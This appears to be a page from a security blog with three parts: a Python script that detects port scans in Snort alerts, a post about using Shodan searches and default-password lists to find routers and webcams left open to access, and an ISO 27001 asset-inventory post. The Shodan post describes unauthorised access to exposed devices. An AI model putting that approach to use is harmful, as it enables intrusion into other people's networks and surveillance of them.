<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjYLKub89r4z7crMbGjwOkzDWZss_eNvYbIlytHlMA1lYvLVTkxwsGhcS7baJm6dqNB8snYZduxcYTWMwNgRqolOvQRvX_GJei_qYoAmBKPbIN_3fTacFSBeSIOYMkiBNP5GUgI5vvWJOQ/s1600/3.png"><span class="Apple-style-span"><img alt="" border="0" id="BLOGGER_PHOTO_ID_5564019873456350178" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjYLKub89r4z7crMbGjwOkzDWZss_eNvYbIlytHlMA1lYvLVTkxwsGhcS7baJm6dqNB8snYZduxcYTWMwNgRqolOvQRvX_GJei_qYoAmBKPbIN_3fTacFSBeSIOYMkiBNP5GUgI5vvWJOQ/s320/3.png" style="cursor: hand; cursor: pointer; display: block; height: 219px; margin: 0px auto 10px; text-align: center; width: 320px;" /><span class="Apple-style-span" style="-webkit-text-decorations-in-effect: none; font-size: small;">:)</span></span></a><br />
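<div>As an added example (not part of the original post, nor code from the Snorby or Snort projects), the following Python script parses Snort alerts written in the "fast" alert format, groups them by source address and flags sources whose alerts touched many distinct destination ports, which is the footprint a quick nmap -F (top 100 ports) leaves in the IDS. The sample alert lines, the signature ids 1000001/1000002 and the 192.168.0.x addresses are constructed for this example; the portscan preprocessor line is handled as the edge case where no ports are printed.</div>

```python
import re
from collections import Counter, defaultdict

# Pattern for Snort's "fast" alert line format (the alert_fast output module).
# The port groups are optional because preprocessor alerts such as the
# portscan detector print bare IP addresses without ports.
FAST_ALERT_RE = re.compile(
    r"^(?P<ts>\d{2}/\d{2}-\d{2}:\d{2}:\d{2}\.\d+)\s+\[\*\*\]\s+"
    r"\[(?P<gid>\d+):(?P<sid>\d+):(?P<rev>\d+)\]\s+(?P<msg>.+?)\s+\[\*\*\]\s+"
    r"(?:\[Classification:\s*(?P<cls>[^\]]*)\]\s+)?"
    r"\[Priority:\s*(?P<prio>\d+)\]\s+"
    r"\{(?P<proto>[^}]+)\}\s+"
    r"(?P<src>\d{1,3}(?:\.\d{1,3}){3})(?::(?P<sport>\d+))?\s+->\s+"
    r"(?P<dst>\d{1,3}(?:\.\d{1,3}){3})(?::(?P<dport>\d+))?$"
)

# Constructed sample alerts (not real Snort output): a quick "nmap -F" style
# scan from 192.168.0.20 against 192.168.0.10, one unrelated alert from
# 192.168.0.30, a preprocessor portscan alert without ports, and a junk line.
# Signature ids 1000001/1000002 are placeholders in the local-rule range.
_SCAN_PORTS = [21, 22, 23, 25, 80, 110, 139, 443, 445, 3389]
SAMPLE_ALERTS = [
    "07/20-13:13:00.%06d  [**] [1:1000001:1] SAMPLE probe to port %d [**] "
    "[Classification: Attempted Information Leak] [Priority: 2] {TCP} "
    "192.168.0.20:%d -> 192.168.0.10:%d" % (i * 1000, p, 40000 + i, p)
    for i, p in enumerate(_SCAN_PORTS)
] + [
    "07/20-13:13:01.400000  [**] [122:1:1] (portscan) TCP Portscan [**] "
    "[Priority: 3] {PROTO:255} 192.168.0.20 -> 192.168.0.10",
    "07/20-13:15:42.000000  [**] [1:1000002:1] SAMPLE request to admin page [**] "
    "[Classification: Web Application Attack] [Priority: 1] {TCP} "
    "192.168.0.30:51515 -> 192.168.0.10:80",
    "this line is not an alert and must be skipped",
]


def parse_fast_alert(line):
    """Parse one fast-format alert line into a dict; return None for non-alert lines."""
    m = FAST_ALERT_RE.match(line.strip())
    if m is None:
        return None
    rec = m.groupdict()
    for key in ("gid", "sid", "rev", "prio"):
        rec[key] = int(rec[key])
    for key in ("sport", "dport"):
        rec[key] = int(rec[key]) if rec[key] is not None else None
    return rec


def summarize_by_source(lines):
    """Aggregate alerts per source IP: alert count, distinct destination
    ports touched and a histogram of signature messages."""
    summary = defaultdict(lambda: {"alerts": 0, "dports": set(), "msgs": Counter()})
    for line in lines:
        rec = parse_fast_alert(line)
        if rec is None:
            continue  # blank or malformed line: skip instead of crashing the report
        entry = summary[rec["src"]]
        entry["alerts"] += 1
        if rec["dport"] is not None:
            entry["dports"].add(rec["dport"])
        entry["msgs"][rec["msg"]] += 1
    return dict(summary)


def likely_scan_sources(lines, min_distinct_ports=8):
    """Sources whose alerts touched at least min_distinct_ports distinct
    destination ports, which is how a quick "nmap -F" looks from the IDS
    side. Returns [(src, distinct_port_count)] sorted by count, then address."""
    summary = summarize_by_source(lines)
    hits = [(src, len(e["dports"])) for src, e in summary.items()
            if len(e["dports"]) >= min_distinct_ports]
    return sorted(hits, key=lambda h: (-h[1], h[0]))


if __name__ == "__main__":
    for src, n in likely_scan_sources(SAMPLE_ALERTS):
        print("%s touched %d distinct destination ports" % (src, n))
```

<div>On the constructed input only 192.168.0.20 is reported (10 distinct ports); the single web alert from 192.168.0.30 stays below the threshold, and the portscan preprocessor line is counted as an alert without contributing a port. The threshold is the knob to tune against your own baseline: a host that legitimately talks to many services on one server will also cross it.</div>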
<div>
<div>
<span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"></span></span></span><br />
<div>
<span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"></span></span></span></span></span></span></span></span><br />
<div style="line-height: normal;">
<span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span" style="font-size: small;"><br /></span></span></span></span></span></span></span></span></span></div>
<div style="line-height: normal;">
<span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span" style="font-size: small;"><br /></span></span></span></span></span></span></span></span></span></div>
<div style="line-height: normal; text-align: right;">
<span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span" style="font-size: small;">Jesús Pérez</span></span></span></span></span></span></span></span></span></div>
</div>
</div>
</div>
<div><b>Playing with SHODAN</b> (published 2010-07-20T13:13:00.009+02:00, updated 2012-02-11T18:17:24.899+01:00)</div>
<div>
<div>
<div>
<span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">Yesterday we spent some time playing with </span></span><span class="Apple-style-span" style="color: black;"><a href="http://www.shodanhq.com/" id="iqup" title="SHODAN"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">SHODAN</span></span></a><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"> </span></span></span><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">and I think it is worth writing down here some rather curious results from the tests we ran. To begin with, what is SHODAN? It is a search engine; to give a quick explanation, instead of searching by content as Google does, it searches for machines (servers, routers, etc.) that run the software we specify, and it also lets us filter the results by other parameters such as country, port or version; <a href="http://quahogcon.org/QC2010Archive/slides/schearer-shodan.pdf">this PDF</a> </span></span><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">explains it in more detail. 
</span></span><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">A good starting point to get familiar with this web application is the </span></span><a href="http://www.shodanhq.com/browse" id="f31y" title="búsquedas populares"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">popular searches</span></span></a><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">, among which we can find some with very surprising results. </span></span><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span><br />
<div style="margin-bottom: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">After a while tinkering, it occurred to us to search for routers, </span></span><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">since with <a href="http://www.phenoelit-us.org/dpl/dpl.html">this list</a></span></span><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"> of default passwords</span></span><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"> (or another of the many out there)</span></span><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"> for each model and a bit of scripting you could work wonders. Below are some examples of searches by router model:</span></span><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span><a href="http://www.shodanhq.com/?q=DWL-G700AP"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">http://www.shodanhq.com/?q=DWL-G700AP</span></span></a></div>
<div style="margin-bottom: 0px; margin-top: 0px;">
<a href="http://www.shodanhq.com/?q=rt314"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">http://www.shodanhq.com/?q=rt314</span></span></a><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span></div>
<a href="http://www.shodanhq.com/?q=wg602"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">http://www.shodanhq.com/?q=wg602</span></span></a><br />
<div style="margin-bottom: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">...</span></span></div>
<span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br />As we might have thought at first, the scripting to try passwords by brute force is not even necessary, since there are far too many with the default configuration:</span></span></div>
<div>
<span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span></div>
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEicK6h81btGK8kWlExyMD3wBUBmXlUNycwGUuvJB-yJwvHU37VN6sAZZFj2gOw703H2-7GL8ddixSorpfBXzl5R_3xPbrRIzDCn0U-ueqylOJNNfDsZD7FgJTEAHvBJE5aGua0-S8-fIbo/s1600/imagen0"><img alt="" border="0" id="BLOGGER_PHOTO_ID_5495945378214300226" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEicK6h81btGK8kWlExyMD3wBUBmXlUNycwGUuvJB-yJwvHU37VN6sAZZFj2gOw703H2-7GL8ddixSorpfBXzl5R_3xPbrRIzDCn0U-ueqylOJNNfDsZD7FgJTEAHvBJE5aGua0-S8-fIbo/s320/imagen0" style="cursor: pointer; display: block; height: 215px; margin-bottom: 10px; margin-left: auto; margin-right: auto; margin-top: 0px; text-align: center; width: 320px;" /></a><br />
<div style="margin-bottom: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span></div>
<div style="margin-bottom: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">So far we see that these are routers like the ones in our own homes. The default configuration can be due to different reasons, ranging from simple storms to someone resetting it as their ISP's support advised and never securing it again out of ignorance, laziness, haste... From experience as customers of more than one ISP, it is not unusual to find that the technicians who do home installations leave it like that for the same reasons.</span></span></div>
<span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br />But we find that even routers for "more serious" purposes, supposedly inside a company (people do not usually have those at home), are accessible without asking for a username or password. Imagine for a moment that someone decided to install a sniffer on this Cisco router </span></span><a href="http://isc.sans.edu/diary.html?storyid=7609" id="z_em" title="como se explica en éste artículo"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">as explained in this article</span></span></a><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">: they could capture everything passing through any of the router's interfaces. Seeing how little effort is made to change the passwords, and with everything a router of this kind allows (creating VPNs, for example), it is better not to think about what could be done from here.</span></span><br />
<div>
<span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span></div>
</div>
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiMSnN5PcDxTd7j6mU4MGWd6c_Mr4BOq-u-lSAIWGdfIluDUIUqV5y_BvhnBNRcLDdiVkR60um9FSIJLncDUUGtcbQZBpHxcqPxSOZeU_O29JAFQU4hqHgqnzhBrHIyy2cnJt1e_ke1UpQ/s1600/imagen1"><img alt="" border="0" id="BLOGGER_PHOTO_ID_5495945929519156178" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiMSnN5PcDxTd7j6mU4MGWd6c_Mr4BOq-u-lSAIWGdfIluDUIUqV5y_BvhnBNRcLDdiVkR60um9FSIJLncDUUGtcbQZBpHxcqPxSOZeU_O29JAFQU4hqHgqnzhBrHIyy2cnJt1e_ke1UpQ/s320/imagen1" style="cursor: pointer; display: block; height: 267px; margin-bottom: 10px; margin-left: auto; margin-right: auto; margin-top: 0px; text-align: center; width: 320px;" /></a><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span></div>
<div>
<span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">In case all this were not surprising enough, we wondered what would happen with video surveillance systems: would they also be exposed with default passwords? It seems to be more of the same; we tried simple searches like the following:</span></span><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span><br />
<div style="margin-bottom: 0px; margin-top: 0px;">
<a href="http://www.shodanhq.com/?q=webcam"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">http://www.shodanhq.com/?q=webcam</span></span></a></div>
<div style="margin-bottom: 0px; margin-top: 0px;">
<a href="http://www.shodanhq.com/?q=video%2Bweb%2Bserver"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">http://www.shodanhq.com/?q=video%2Bweb%2Bserver</span></span></a><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span></div>
<span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span><br />
<div style="margin-bottom: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">And we see that we get a multitude of results. The default passwords of these systems are a bit harder to find, and I do not know whether there is a list similar to the previous one, but in the product manuals or on sites such as the manufacturers' own forums it does not take long.</span></span></div>
<div style="margin-bottom: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="-webkit-text-decorations-in-effect: underline; color: #0000ee;"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span></span></div>
<div style="margin-bottom: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="-webkit-text-decorations-in-effect: underline; color: #0000ee;"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span><img alt="" border="0" id="BLOGGER_PHOTO_ID_5495946399255692274" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi00VrvApGUmzd6-Offdyfj-E6ct3ogXg9HnNJNQQSQKDZKlb0Whln4rxKI4h6PkXuDt9-MnhHbx1YR_tWUnvmuOJWj9Wsn_-LbV_hTqkF2kkFi3mORxRHiFhpvTzNRwMSpCHAggtrukA0/s320/imagen2" style="cursor: pointer; display: block; height: 215px; margin-bottom: 10px; margin-left: auto; margin-right: auto; margin-top: 0px; text-align: center; width: 320px;" /></span></div>
</div>
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiJnsWyfzjBWv2u4APEENy6Lt2u1-CbYIPdpyP_2ci-pmCFWbqcQ0yIOIWZXmpMyJhrgiu7GBtwFYRUttQc_CWi30nsmiv6tX6o4TiS4rsNTlbcFruEej9j1w3CFHlIJE1Cf2S0U9JR9qc/s1600/imagen3"><img alt="" border="0" id="BLOGGER_PHOTO_ID_5495946401755857842" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiJnsWyfzjBWv2u4APEENy6Lt2u1-CbYIPdpyP_2ci-pmCFWbqcQ0yIOIWZXmpMyJhrgiu7GBtwFYRUttQc_CWi30nsmiv6tX6o4TiS4rsNTlbcFruEej9j1w3CFHlIJE1Cf2S0U9JR9qc/s320/imagen3" style="cursor: hand; cursor: pointer; display: block; height: 263px; margin: 0px auto 10px; text-align: center; width: 320px;" /></a><br />
<div>
<div>
<span class="Apple-style-span" style="font-family: Arial;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Georgia, serif; font-size: 130%;"><span class="Apple-style-span" style="font-size: 16px;"><span class="Apple-style-span" style="font-family: Arial; font-size: 13px;"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span></span></span></span></span></span></div>
<div>
<span class="Apple-style-span" style="font-family: Arial;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Georgia, serif; font-size: 130%;"><span class="Apple-style-span" style="font-size: 16px;"><span class="Apple-style-span" style="font-family: Arial; font-size: 13px;"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">The idea that we could be recorded (both at work and in your own home) and broadcast over the Internet "almost" in the open is not something I think anyone would find amusing; no comment...</span></span><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span></span></span></span></span></span><br />
<div style="margin-bottom: 0px; margin-top: 0px; text-align: right;">
<span class="Apple-style-span" style="font-family: Arial;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Georgia, serif; font-size: 130%;"><span class="Apple-style-span" style="font-size: 16px;"><span class="Apple-style-span" style="font-family: Arial; font-size: 13px;"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">Carlos López</span></span></span></span></span></span></span></div>
<div style="margin-bottom: 0px; margin-top: 0px; text-align: right;">
<span class="Apple-style-span" style="font-family: Arial;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Georgia, serif; font-size: 130%;"><span class="Apple-style-span" style="font-size: 16px;"><span class="Apple-style-span" style="font-family: Arial; font-size: 13px;"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">Jesús Pérez</span></span></span></span></span></span></span></div>
</div>
</div>
<div><b>ISO 27001: Inventory of information assets</b> (published 2010-06-01T18:40:00.013+02:00, updated 2012-02-11T18:19:54.017+01:00)</div>
<div>
<div>
<span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="color: #333333;"><span class="Apple-style-span" style="font-size: small;">One of the first steps an organization must take to comply with the </span><a href="http://es.wikipedia.org/wiki/ISO/IEC_27001"><span class="Apple-style-span" style="font-size: small;">ISO 27001</span></a><span class="Apple-style-span" style="font-size: small;"> standard is to carry out the asset inventory, which will contain all the information assets that have some value for the organization and fall within the scope of the </span><a href="http://es.wikipedia.org/wiki/Sistema_de_Gesti%C3%B3n_de_la_Seguridad_de_la_Informaci%C3%B3n"><span class="Apple-style-span" style="font-size: small;">ISMS</span></a><span class="Apple-style-span" style="font-size: small;">. At first it can seem a bit overwhelming for a beginner (like me) because of the enormous number of assets that keep coming to mind, so I decided to start by classifying them somehow. Among the many ways I found, I chose the one defined by the experts of the </span><a href="http://groups.google.com/group/iso27001security"><span class="Apple-style-span" style="font-size: small;">ISO27k forum</span></a><span class="Apple-style-span" style="font-size: small;">, since it seems the most complete to me, shows examples of each type and is valid for organizations of very different kinds. This could be a good starting point, always bearing in mind what they also advise on that forum:</span></span></span></div>
<div>
<span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="color: #333333;"><i><span class="Apple-style-span" style="font-size: small;">"Because assets are something that changes, even if you could cover absolutely everything that exists today, tomorrow the situation would be a little different, and more so in a few weeks, months or years. So it is perfectly acceptable to go with an inventory that is 'good enough for now', always including in the ISMS the review and updating of processes as part of continuous improvement"</span></i></span></span></div>
<div>
<span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="color: #333333;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span></span></div>
<div>
<span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="color: #333333;"><span class="Apple-style-span" style="font-size: small;">Translation of the article:</span></span></span></div>
<div>
<span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="color: #333333;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span></span></div>
<div>
<div>
<span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="color: #333333;"><b><span class="Apple-style-span" style="font-size: small;">PURE INFORMATION ASSETS</span></b></span></span></div>
<div>
<span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="color: #333333;"><b><span class="Apple-style-span" style="font-size: small;"><br /></span></b></span></span></div>
<div>
<span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="color: #333333;"><span class="Apple-style-span" style="font-size: small;">- </span><b><span class="Apple-style-span" style="font-size: small;">Digital data</span></b><span class="Apple-style-span" style="font-size: small;">: Personal, financial, legal, research and development, strategic and commercial, e-mail, voicemail, databases, private and shared logical drives (partitions), backups (tapes, CDs, DVDs), encryption keys.</span></span></span></div>
<div>
<span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="color: #333333;"><span class="Apple-style-span" style="font-size: small;">- </span><b><span class="Apple-style-span" style="font-size: small;">Tangible assets</span></b><span class="Apple-style-span" style="font-size: small;">: Personal, financial, legal, research and development, strategic and commercial, postal/electronic mail, faxes, microfiche and other backup/archive materials, keys to offices/safes and other storage media, books, magazines, newspapers.</span></span></span></div>
<div>
<span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="color: #333333;"><span class="Apple-style-span" style="font-size: small;">- </span><b><span class="Apple-style-span" style="font-size: small;">Intangible assets</span></b><span class="Apple-style-span" style="font-size: small;">: Knowledge, business relationships and trade secrets, licences, patents, experience, technical know-how, corporate image/brand/commercial reputation/customer trust, competitive advantage, ethics, productivity.</span></span></span></div>
<div>
<span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="color: #333333;"><span class="Apple-style-span" style="font-size: small;">- </span><b><span class="Apple-style-span" style="font-size: small;">Application software</span></b><span class="Apple-style-span" style="font-size: small;">: Proprietary software developed in-house, client software (shared and desktop applications), COTS, enterprise resource planning (ERP), management information systems (MIS), database utilities and tools, e-commerce applications, middleware.</span></span></span></div>
<div>
<span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="color: #333333;"><span class="Apple-style-span" style="font-size: small;">- </span></span></span><span class="Apple-style-span" style="color: #333333; font-family: verdana;"><b><span class="Apple-style-span" style="font-size: small;">Operating systems</span></b><span class="Apple-style-span" style="font-size: small;">: For servers, desktop computers, mainframes, network devices, handheld and embedded devices (including BIOS and firmware).</span></span></div>
<div>
<span class="Apple-style-span" style="color: #333333; font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span></div>
<div>
<span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="color: #333333;"><b><span class="Apple-style-span" style="font-size: small;">PHYSICAL ASSETS</span></b></span></span></div>
<div>
<span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="color: #333333;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span></span></div>
<div>
<span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="color: #333333;"><span class="Apple-style-span" style="font-size: small;">- </span><b><span class="Apple-style-span" style="font-size: small;">IT infrastructure</span></b><span class="Apple-style-span" style="font-size: small;">: Buildings, data centres, equipment and server rooms, network/cabling cabinets, offices, desks/drawers/filing cabinets, physical media storage rooms and safes, personnel identification and authentication/access control devices (turnstiles, cards, etc.) and other security devices (closed-circuit television (CCTV), etc.)</span></span></span></div>
<div>
<span class="Apple-style-span" style="color: #333333; font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">- </span><b><span class="Apple-style-span" style="font-size: small;">IT environment controls</span></b><span class="Apple-style-span" style="font-size: small;">: Fire alarm/suppression equipment, uninterruptible power supplies (UPS), power and mains supply, power conditioners/filters/surge suppressors, dehumidifiers/air conditioners/air alarms, water alarms.</span></span></div>
<div>
<span class="Apple-style-span" style="color: #333333; font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">- </span><b><span class="Apple-style-span" style="font-size: small;">IT hardware</span></b><span class="Apple-style-span" style="font-size: small;">: Storage and computing devices such as desktop computers, workstations, laptops, handheld devices, servers, mainframes, modems, network termination lines, communications devices (network nodes), printers/photocopiers/fax machines and multifunction devices.</span></span></div>
<div>
<span class="Apple-style-span" style="color: #333333; font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span></div>
<div>
<span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="color: #333333;"><b><span class="Apple-style-span" style="font-size: small;">IT SERVICE ASSETS</span></b></span></span></div>
<div>
<span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="color: #333333;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span></span></div>
<div>
<span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="color: #333333;"><span class="Apple-style-span" style="font-size: small;">User authentication and user process administration services, links, firewalls, proxy servers, network services, wireless services, anti-spam/virus/spyware, intrusion detection/prevention, teleworking, security, FTP, e-mail/instant messaging, etc., web services, software support and maintenance contracts.</span></span></span></div>
<div>
<div>
<span class="Apple-style-span" style="color: #333333; font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span></div>
<div>
<span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="color: #333333;"><b><span class="Apple-style-span" style="font-size: small;">HUMAN ASSETS:</span></b></span></span></div>
<div>
<span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="color: #333333;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span></span></div>
<div>
<span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="color: #333333;"><span class="Apple-style-span" style="font-size: small;">- </span><b><span class="Apple-style-span" style="font-size: small;">Employees</span></b><span class="Apple-style-span" style="font-size: small;">: Staff and managers, in particular those with management roles such as senior officers or executive directors, software architects and developers/testers, system administrators, security administrators, operators, lawyers, auditors, power users and experts in general.</span></span></span></div>
<div>
<span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="color: #333333;"><span class="Apple-style-span" style="font-size: small;">- </span><b><span class="Apple-style-span" style="font-size: small;">External</span></b><span class="Apple-style-span" style="font-size: small;">: Temporary workers, external consultants or specialist advisers, specialist contractors (for example, those who handle maintenance of the physical IT environment), suppliers and partners...</span></span></span></div>
<div>
<span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="color: #333333;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span></span></div>
<div>
<span class="Apple-style-span" style="color: #333333; font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">As for software to create the inventory, </span><a href="http://iso27000.wik.is/Area_Normas/ISO//IEC_27002/07._Gesti%C3%B3n_de_Activos/7.1._Responsabilidad_sobre_los_activos/7.1.1._Inventario_de_Activos"><span class="Apple-style-span" style="font-size: small;">this wiki</span></a><span class="Apple-style-span" style="font-size: small;"> on ISO 27000 offers some paid options and a free spreadsheet, but once again I prefer the ISO27k forum alternative [ many thanks ;) ]: its </span><a href="http://www.iso27001security.com/ISO27k_toolkit_3v9.zip"><span class="Apple-style-span" style="font-size: small;">toolkit</span></a><span class="Apple-style-span" style="font-size: small;"> contains a much more complete spreadsheet organized by asset type (</span><i><span class="Apple-style-span" style="font-size: small;">ISO27k Asset Register.xls</span></i><span class="Apple-style-span" style="font-size: small;">)</span></span></div>
</div>
<div>
<span class="Apple-style-span" style="color: #333333; font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span></div>
</div>
</div>
<div>
<span class="Apple-style-span" style="font-size: small;"><br /></span></div>
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh3wlhLsPb2RwPg95LtB9_HOlB0AH4cefFH-PWJCAHcdmUapMpZxp1IBbzhstXLu3pVP86ZAUWNIVU0dBKFrKgZ5jihFgtIh4LhCQIMQH_UzprxFMck2HtUFWiNH993dErwILs3nb8EcZg/s1600/imagen.png"><img alt="" border="0" id="BLOGGER_PHOTO_ID_5477848523941339730" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh3wlhLsPb2RwPg95LtB9_HOlB0AH4cefFH-PWJCAHcdmUapMpZxp1IBbzhstXLu3pVP86ZAUWNIVU0dBKFrKgZ5jihFgtIh4LhCQIMQH_UzprxFMck2HtUFWiNH993dErwILs3nb8EcZg/s320/imagen.png" style="cursor: hand; cursor: pointer; display: block; height: 320px; margin: 0px auto 10px; text-align: center; width: 303px;" /></a><br />
<div>
